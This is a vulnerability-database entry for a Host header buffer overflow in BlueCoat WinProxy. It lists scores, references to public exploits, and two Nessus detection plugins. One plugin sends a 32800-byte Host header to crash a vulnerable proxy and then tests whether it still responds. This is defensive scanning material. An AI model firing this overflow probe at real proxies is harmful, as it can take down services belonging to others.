Vulnerabilities > CVE-2005-4085 - Remote Host Header Buffer Overflow vulnerability in Bluecoat Proxyav and Webproxy

047910
CVSS v2 base score 7.5 - HIGH (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
bluecoat
nessus
exploit available
metasploit

Summary

Buffer overflow in BlueCoat (a) WinProxy before 6.1a and (b) the web console access functionality in ProxyAV before 2.4.2.3 allows remote attackers to execute arbitrary code via a long Host: header.

Exploit-Db

  • description: BlueCoat WinProxy 6.0 R1c (Host) Remote Stack/SEH Overflow Exploit. CVE-2005-4085. Remote exploit for the Windows platform.
    idEDB-ID:1408
    last seen2016-01-31
    modified2006-01-07
    published2006-01-07
    reporterFistFuXXer
    sourcehttps://www.exploit-db.com/download/1408/
    titleBlueCoat WinProxy 6.0 R1c Host Remote Stack/SEH Overflow Exploit
  • description: Blue Coat WinProxy Host Header Overflow. CVE-2005-4085. Remote exploit for the Windows platform.
    idEDB-ID:16691
    last seen2016-02-02
    modified2010-07-12
    published2010-07-12
    reportermetasploit
    sourcehttps://www.exploit-db.com/download/16691/
    titleBlue Coat WinProxy Host Header Overflow

Metasploit

description: This module exploits a buffer overflow in the Blue Coat Systems WinProxy service by sending an HTTP request whose Host header carries an overlong port value.
idMSF:EXPLOIT/WINDOWS/PROXY/BLUECOAT_WINPROXY_HOST
last seen2020-06-01
modified2017-07-24
published2006-01-08
references
reporterRapid7
sourcehttps://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/proxy/bluecoat_winproxy_host.rb
titleBlue Coat WinProxy Host Header Overflow

Nessus

  • NASL familyFirewalls
    NASL idWINPROXY_61A.NASL
    description: The remote host is running WinProxy, a proxy server for Windows. According to the Windows registry, the installed version of WinProxy suffers from denial of service and buffer overflow vulnerabilities in its telnet and web proxy servers. An attacker may be able to exploit these issues to crash the proxy or even execute arbitrary code on the affected host.
    last seen2020-06-01
    modified2020-06-02
    plugin id20393
    published2006-01-10
    reporterThis script is Copyright (C) 2006-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/20393
    titleWinProxy < 6.1a Multiple Vulnerabilities (credentialed check)
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    
    
    include("compat.inc");
    
    if (description) {
      # Registration pass: `description` is set when Nessus loads the plugin,
      # so this branch only records metadata and exits before the registry
      # check further down is reached.
      script_id(20393);
      script_version("1.14");
    
      # CVE-2005-4085 is the Host header overflow this page covers; the other
      # two IDs are the remaining WinProxy < 6.1a issues (telnet/DoS, per the
      # description text below) fixed by the same release.
      script_cve_id("CVE-2005-3187", "CVE-2005-3654", "CVE-2005-4085");
      script_bugtraq_id(16147, 16148, 16149);
    
      script_name(english:"WinProxy < 6.1a Multiple Vulnerabilities (credentialed check)");
      script_summary(english:"Checks for multiple vulnerabilities in WinProxy < 6.1a");
    
     script_set_attribute(attribute:"synopsis", value:
    "The remote proxy is affected by multiple vulnerabilities." );
     script_set_attribute(attribute:"description", value:
    "The remote host is running WinProxy, a proxy server for Windows. 
    
    According to the Windows registry, the installed version of WinProxy
    suffers from denial of service and buffer overflow vulnerabilities in
    its telnet and web proxy servers.  An attacker may be able to exploit
    these issues to crash the proxy or even execute arbitrary code on the
    affected host." );
     script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?40f07cd6" );
     script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?3a6c81a5" );
     script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?79b3006b" );
     script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?8c88612f" );
     script_set_attribute(attribute:"solution", value:
    "Upgrade to WinProxy version 6.1a or later." );
     # Same CVSS v2 base vector as the CVE (7.5). Temporal: functional exploit
     # (E:F), official fix available (RL:OF), confirmed (RC:C).
     script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
     script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
     script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
     script_set_attribute(attribute:"exploit_available", value:"true");
     script_set_attribute(attribute:"metasploit_name", value:'Blue Coat WinProxy Host Header Overflow');
     script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
     script_set_attribute(attribute:"plugin_publication_date", value: "2006/01/10");
     script_set_attribute(attribute:"patch_publication_date", value: "2006/01/05");
     script_set_attribute(attribute:"vuln_publication_date", value: "2006/01/05");
     script_cvs_date("Date: 2018/08/06 14:03:14");
    # Credentialed (local) check: it reads the registry over SMB and never
    # touches the proxy service itself.
    script_set_attribute(attribute:"plugin_type", value:"local");
    script_end_attributes();
    
     
      # ACT_GATHER_INFO: a passive lookup only. The remote variant (plugin
      # 20391, ACT_DENIAL) is the one that actually sends the overflow.
      script_category(ACT_GATHER_INFO);
      script_family(english:"Firewalls");
      script_copyright(english:"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.");
      # smb_hotfixes.nasl is expected to supply the SMB/Registry/* KB keys read
      # by the check below -- confirm against that plugin if the key changes.
      script_dependencies("smb_hotfixes.nasl");
      script_require_keys("SMB/Registry/Enumerated");
      script_require_ports(139, 445);
    
      exit(0);
    }
    
    
    # Nothing to do unless the registry was enumerated over SMB
    # (see script_require_keys in the registration block above).
    if (!get_kb_item("SMB/Registry/Enumerated")) exit(0);
    
    
    # The WinProxy uninstall entry carries the version inside its DisplayName;
    # the pattern below expects the form "WinProxy (Version X.Y ...".
    display_name = get_kb_item("SMB/Registry/HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/WinProxy 6/DisplayName");
    if (!display_name) exit(0);
    
    # Every 0.x-5.x release and 6.0 predate the 6.1a fix.  Reported against
    # port 0 because this is a local, credentialed check.
    # NOTE(review): a plain "6.1" (no "a") would not match; confirm whether such
    # a build ever shipped before widening the pattern.
    if (display_name =~ "^WinProxy \(Version ([0-5]\.|6\.0)") {
      security_hole(0);
      exit(0);
    }
    
    
  • NASL familyFirewalls
    NASL idWINPROXY_HTTP_61A.NASL
    description: The remote host is running WinProxy, a proxy server for Windows. The installed version of WinProxy's HTTP proxy fails to handle long requests as well as requests with long Host headers. An attacker may be able to exploit these issues to crash the proxy or even execute arbitrary code on the affected host.
    last seen2020-06-01
    modified2020-06-02
    plugin id20391
    published2006-01-10
    reporterThis script is Copyright (C) 2006-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/20391
    titleWinProxy < 6.1a HTTP Proxy Multiple Vulnerabilities
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description) {
      # Registration pass: `description` is set when Nessus loads the plugin,
      # so this branch only records metadata and exits before the active
      # check further down is reached.
      script_id(20391);
      script_version("1.19");
    
      # Only the HTTP-proxy issues: CVE-2005-3187 and the CVE-2005-4085 Host
      # header overflow.  The telnet-side CVE-2005-3654 is left to the
      # credentialed plugin 20393.
      script_cve_id("CVE-2005-3187", "CVE-2005-4085");
      script_bugtraq_id(16147, 16148);
    
      script_name(english:"WinProxy < 6.1a HTTP Proxy Multiple Vulnerabilities");
      script_summary(english:"Checks for multiple vulnerabilities in WinProxy < 6.1a HTTP Proxy");
    
     script_set_attribute(attribute:"synopsis", value:
    "The remote web proxy server is affected by denial of service and
    buffer overflow vulnerabilities." );
     script_set_attribute(attribute:"description", value:
    "The remote host is running WinProxy, a proxy server for Windows. 
    
    The installed version of WinProxy's HTTP proxy fails to handle long
    requests as well as requests with long Host headers.  An attacker may
    be able to exploit these issues to crash the proxy or even execute
    arbitrary code on the affected host." );
     script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?40f07cd6" );
     script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?3a6c81a5" );
     script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?8c88612f" );
     script_set_attribute(attribute:"solution", value:
    "Upgrade to WinProxy version 6.1a or later." );
     # Same CVSS v2 base vector as the CVE (7.5). Temporal: functional exploit
     # (E:F), official fix available (RL:OF), confirmed (RC:C).
     script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
     script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
     script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
     script_set_attribute(attribute:"exploit_available", value:"true");
     script_set_attribute(attribute:"metasploit_name", value:'Blue Coat WinProxy Host Header Overflow');
     script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
     script_set_attribute(attribute:"plugin_publication_date", value: "2006/01/10");
     script_set_attribute(attribute:"patch_publication_date", value: "2006/01/05");
     script_set_attribute(attribute:"vuln_publication_date", value: "2006/01/05");
     script_cvs_date("Date: 2018/08/06 14:03:14");
    # Remote (unauthenticated) check: it talks to the proxy over HTTP and needs
    # no credentials.
    script_set_attribute(attribute:"plugin_type", value:"remote");
    script_end_attributes();
    
     
      # ACT_DENIAL: the check below really sends the overflowing Host header
      # and reports when the proxy stops answering, so it can take a vulnerable
      # target down.  NOTE(review): confirm this category is excluded under
      # safe checks before running it against production proxies.
      script_category(ACT_DENIAL);
      script_family(english:"Firewalls");
      script_copyright(english:"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.");
      script_dependencies("find_service2.nasl", "httpver.nasl");
      script_require_ports("Services/www", 80);
    
      exit(0);
    }
    
    
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    
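    port = get_http_port(default:80, dont_break: 1);
    
    
    # Only fire against a service that identifies itself as WinProxy: the
    # probe below is destructive (it may crash the proxy), so it must not be
    # sent blindly to every web server.
    help = get_kb_banner(port: port, type: "help");
    if (!(help && "Proxy-agent: BlueCoat-WinProxy" >< help)) exit(0);
    
    # Flag it as a proxy.
    register_service(port:port, ipproto:"tcp", proto:"http_proxy");
    
    # Baseline: confirm the proxy answers the very request we will use as the
    # liveness probe after the attack.  Without this, a proxy that simply never
    # replies to a plain "GET /" would be reported as vulnerable.
    baseline = http_send_recv3(port: port, item:"/", method:"GET");
    if (isnull(baseline)) exit(0);
    
    # Trigger CVE-2005-4085: a 32800-byte Host header, far longer than anything
    # the proxy expects (a stack/SEH overflow per the public exploits).  Note
    # that port: 80 here is the origin port inside the proxied URL
    # (http://127.0.0.1:80/), not the proxy's own listening port, which is
    # passed separately to the send call.  Any reply to this request is
    # irrelevant; what matters is whether the service survives it.
    rq = http_mk_proxy_request(port: 80, item: "/", host: "127.0.0.1", method: "GET", scheme: "http", version: 10, add_headers: make_array("Host", crap(32800)));
    http_send_recv_req(port: port, req: rq);
    
    # Liveness probe: if the proxy no longer answers the request it answered a
    # moment ago, the overflow took it down.
    w = http_send_recv3(port: port, item:"/", method:"GET");
    if (isnull(w)) security_hole(port);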
    

Packetstorm

data sourcehttps://packetstormsecurity.com/files/download/83192/bluecoat_winproxy_host.rb.txt
idPACKETSTORM:83192
last seen2016-12-05
published2009-11-26
reporterMC
sourcehttps://packetstormsecurity.com/files/83192/Blue-Coat-WinProxy-Host-Header-Overflow.html
titleBlue Coat WinProxy Host Header Overflow

Seebug

bulletinFamilyexploit
description: No description provided by source.
idSSV:13614
last seen2017-11-19
modified2006-01-07
published2006-01-07
reporterRoot
sourcehttps://www.seebug.org/vuldb/ssvid-13614
titleBlueCoat WinProxy 6.0 R1c (Host) Remote Stack/SEH Overflow Exploit